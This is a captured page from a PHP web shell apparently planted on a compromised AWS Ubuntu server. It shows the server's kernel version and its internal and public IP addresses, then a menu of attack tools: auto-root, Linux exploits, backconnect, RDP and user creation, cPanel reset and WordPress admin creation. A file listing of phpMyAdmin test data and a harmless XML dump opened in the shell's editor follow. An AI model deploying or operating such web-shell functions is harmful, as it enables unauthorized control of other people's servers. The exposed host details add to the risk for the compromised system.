Linux ip-172-31-33-47 5.4.0-1045-aws #47~18.04.1-Ubuntu SMP Tue Apr 13 15:58:14 UTC 2021 x86_64
Apache/2.4.29 (Ubuntu)
: 172.31.33.47 | : 18.188.149.185
Cant Read [ /etc/named.conf ]
7.4.20
www-data
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
html /
stage /
phpmyadmin /
tests /
test_data /
[ HOME SHELL ]
Name
Size
Permission
Action
changelog
[ DIR ]
drwxr-xr-x
gis
[ DIR ]
drwxr-xr-x
routes
[ DIR ]
drwxr-xr-x
__slashes.mediawiki
135
B
-rw-r--r--
config.inc.php
311
B
-rw-r--r--
db_import.sql
157
B
-rw-r--r--
db_test.csv
57
B
-rw-r--r--
db_test.ods
7.01
KB
-rw-r--r--
db_test_ldi.csv
57
B
-rw-r--r--
dresden_osm.shp.zip
337.62
KB
-rw-r--r--
exploit_test.sql
3.94
KB
-rw-r--r--
import-slim.ods.xml
52.53
KB
-rw-r--r--
phpmyadmin.mediawiki
213
B
-rw-r--r--
phpmyadmin_importXML_For_Testi...
1.59
KB
-rw-r--r--
pma_bookmark.sql
1.55
KB
-rw-r--r--
server_import.sql
271
B
-rw-r--r--
table_import.sql
98
B
-rw-r--r--
test.bz2
49
B
-rw-r--r--
test.file
10
B
-rw-r--r--
test.gz
40
B
-rw-r--r--
test.zip
178
B
-rw-r--r--
timezone.shp.zip
2.74
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : phpmyadmin_importXML_For_Testing.xml
<?xml version="1.0" encoding="utf-8"?> <!-- - phpMyAdmin XML Dump FOR testing - version 4.1-dev - https://www.phpmyadmin.net - - Host: 127.0.0.1 - Generation Time: Jun 15, 2013 at 02:59 PM - Server version: 5.5.27-log - PHP Version: 5.4.7 --> <pma_xml_export version="1.0" xmlns:pma="https://www.phpmyadmin.net/some_doc_url/"> <!-- - Structure schemas --> <pma:structure_schemas> <pma:database name="phpmyadmintest" collation="utf8_bin" charset="utf8"> <pma:table name="pma_bookmarktest"> CREATE TABLE `pma_bookmarktest` ( `id` int(11) NOT NULL AUTO_INCREMENT, `dbase` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', `user` varchar(255) COLLATE utf8_bin NOT NULL DEFAULT '', `label` varchar(255) CHARACTER SET utf8 NOT NULL DEFAULT '', `query` text COLLATE utf8_bin NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=utf8 COLLATE=utf8_bin COMMENT='Bookmarks'; </pma:table> </pma:database> </pma:structure_schemas> <!-- - Database: 'phpmyadmintest' --> <database name="phpmyadmintest"> <!-- Table pma_bookmarktest --> <table name="pma_bookmarktest"> <column name="id">1</column> <column name="dbase">pma_dbase</column> <column name="user"></column> <column name="label">pma_label</column> <column name="query">SELECT * FROM `db_content` WHERE 1</column> </table> </database> </pma_xml_export>
Close